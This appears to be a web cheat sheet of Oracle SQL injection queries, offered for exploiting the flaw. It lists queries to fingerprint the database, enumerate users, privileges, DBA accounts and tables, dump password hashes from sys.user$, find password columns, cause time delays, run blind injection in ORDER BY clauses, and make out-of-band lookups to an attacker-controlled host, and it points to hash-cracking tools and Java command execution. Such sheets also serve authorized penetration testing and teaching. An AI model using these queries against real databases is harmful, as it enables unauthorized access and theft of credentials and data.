Oracle SQL Injection Cheat Sheet

Oracle SQL injection is a security vulnerability that arises in applications that use oracle DB as a database. By the use of vulnerability, an attacker can gain unauthorized access to stored information in the database. Below is the collection of SQL queries or keywords which can be used for the exploitation of oracle SQL injection.

Oracle SQL Injection Cheat Sheet

VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
CommentsSELECT 1 FROM dual—comment
— NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
Current UserSELECT user FROM dual
List UsersSELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — Privilege Required
List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  a status tells you if your account is locked
SELECT name,spare4 FROM sys.user$ — Privilege Required, 11g
 Password CrackerCheck these two tools to crack the DES-based hashes from Oracle 8, 9, and 10.
Another tool.
List PrivilegesSELECT * FROM session_privs; — current privilege
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — Privilege Required, list a user’s privilege
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — Privilege Required, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current DatabaseSELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
— Also query TNS listener for other databases. 
List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
List TablesSELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth RowSELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> CharSELECT chr(65) FROM dual; — returns A
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65
CastingSELECT CAST(1 AS char) FROM dual;
SELECT CAST(‘1’ AS int) FROM dual;
String ConcatenationSELECT ‘A’ || ‘B’ FROM dual; — returns AB
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding QuotesSELECT chr(65) || chr(66) FROM dual; — returns AB
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — if reverse looks are slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
— Also see Heavy Queries to create a time delay
Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command ExecutionJavacan is used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. 🙁
Local File AccessUTL_FILE can sometimes be used.  Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — gets hostnames
Location of DB filesSELECT name FROM V$DATAFILE;
Default/System DatabasesSYSTEM
SYSAUX
Get all tablenames in one stringselect rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,’) from all_tables —  when using union based SQLI with only one row
Blind SQLi in order by clauseorder by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same data type

1 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *